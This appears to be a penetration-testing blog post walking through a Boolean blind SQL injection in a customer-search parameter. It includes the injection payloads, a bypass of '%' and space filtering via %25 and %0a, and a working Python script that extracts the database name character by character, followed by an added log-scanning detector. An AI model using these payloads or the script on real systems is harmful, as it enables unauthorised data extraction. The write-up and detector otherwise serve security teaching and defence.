PY trading with Boolean blind injection

After the good feedback on the previous article, I happened to find this Boolean blind injection in a project, so I wrote it up as well. The overall format is the same as before, but the content is different. Next, let's take a look at what this PY trade is doing. Let me think it through again.


One, identify the problem
During this test an injection point was found. The response packet contained the SQL statement, which confirmed that the parameter could be injected, so I started this injection attempt.

First of all, we can confirm that this is a GET request. I thought it was a simple error-based injection and that sqlmap could be pointed at it directly, but reality gave me a slap in the face: sqlmap could not exploit this vulnerability at all. However, my database statement did appear in the returned data packet, so I took the returned statement and started a little construction process.

The copied database statement:

SELECT count(0) FROM customer c WHERE c.dealership_id = ? AND c.active = true AND (c.full_name LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number LIKE '%1%')
 AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub1 LIKE '%1%') AND 1 IN (1, 2) AND (c.full_name LIKE '%test%' OR c.phone_number_sub2 LIKE '%1%') AND 1 IN 
(1, 2) AND (c.full_name LIKE '%test%')

Two, test statement
Experiments showed that the error content changes with the input, which indicates that the parameter really does affect the database statement. However, the statement has to be closed properly and the returned content cannot be used directly, so error-based injection can be excluded. That leaves only two detectable injection types: time-based blind and Boolean blind, with the test statement appended directly after the target parameter.

Construct the database statement:

%'){Test statement}AND(c.full_name like'%test

The request succeeds and the statement is closed (note that the database uses a LIKE '%...%' fuzzy query). Testing also showed that there is filtering: a bare % and a space are both rejected, and the system returns 404. To rebuild the statement that broke earlier, use %25 and %20 to bypass the filtering of single % characters and spaces, construct the statement above so that it closes correctly, get a 200 back, and confirm that a normal data packet is returned. A Boolean blind injection test can then be performed based on whether the database statement evaluates to true.

Next, confirm the test statement

27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test

Match character by character (substring interception) to confirm the database name.

Three, tool ideas
3.1 Sending the data packet
Use Python to send the request and batch-test the target content.

Unlike time-based blind injection, Boolean blind injection has to confirm the result from differences in the returned data packet.

%0a(ascii(substr(database(),{1},1))={0})%0a

Use the find function to look for a characteristic string in the response and determine whether the injected condition was true.

# coding:utf-8
import requests
import datetime
import time

headers = {
    # Header information: fill in the request headers yourself (e.g. Cookie, User-Agent)
}
chars = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789@_.'   # character set (the loop below walks ASCII 49..124 instead)
database = ''
for j in range(1, 11):                 # j: position in the database name
    for i in range(49, 125):           # i: candidate ASCII code for that position
        Url = 'https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxx/find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),{1},1))={0})%0aAND(c.full_name%0alike%0a%27%25test'
        UrlFormat = Url.format(i, j)   # format() fills {0} with the ASCII code and {1} with the position
        r = requests.get(UrlFormat, headers=headers)
        d = r.text.find("Test")        # look for the characteristic string in the response; a hit means the condition was true
        if d != -1:
            print(i)
            print(chr(i))
            database += chr(i)
            print(database)
            break
        else:
            pass
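As an added defender-side example (not code from the original post), here is a small log scanner that normalises the double-encoded %25 and the %0a whitespace substitution described above and flags the per-character ascii(substr(...)) probe in access-log lines. The log lines, client addresses and the /find path are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (not from the original post); client IPs and path are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /find?pageNo=1&pageSize=20&searchWord=1%25%27)and%0a(ascii(substr(database(),1,1))=115)%0aAND(c.full_name%0alike%0a%27%25test HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /find?pageNo=1&pageSize=20&searchWord=1%2527)and%0a(ascii(substr(database(),1,1))=116)%0aAND(c.full_name%0alike%0a%27%25test HTTP/1.1" 200 640
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /find?pageNo=1&pageSize=20&searchWord=test HTTP/1.1" 200 640
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Signatures applied to the normalised value: the per-character probe used by the post's script,
# and the quote/parenthesis break-out that precedes it.
SIGNATURES = {
    "char_probe": re.compile(r"\b(ascii|ord)\s*\(\s*(substr|substring|mid)\s*\("),
    "quote_breakout": re.compile(r"'\s*\)\s*(and|or)\b"),
}

def normalise(value, max_rounds=3):
    """Percent-decode until stable (catches %2527 -> %27 -> '), then collapse comments and whitespace substitutes."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*.*?\*/", " ", value)          # /* */ comments become a space
    return re.sub(r"\s+", " ", value).lower()          # \n, \t (%0a, %09) become one space

def classify_request(path):
    """Return the names of the signatures matched by any query parameter in path."""
    hits = []
    for _name, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        norm = normalise(raw)
        for sig, rx in SIGNATURES.items():
            if sig not in hits and rx.search(norm):
                hits.append(sig)
    return hits

def scan_log(text):
    """Return (client, status, hits) for each request matching at least one signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        hits = classify_request(path)
        if hits:
            findings.append((client, int(status), hits))
    return findings
```

Because the script loops over 76 candidate codes per character position, a burst of such hits from one client within seconds is the practical alert condition, not a single match.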

Four, future thoughts
There are the following ideas for the future of the code:

1. Add the ability to load a request packet directly

2. Make the value substituted for 0 adjustable

3. Optimize threading

4. Write the code for the GET method

5. Refactor the logic of the overall code
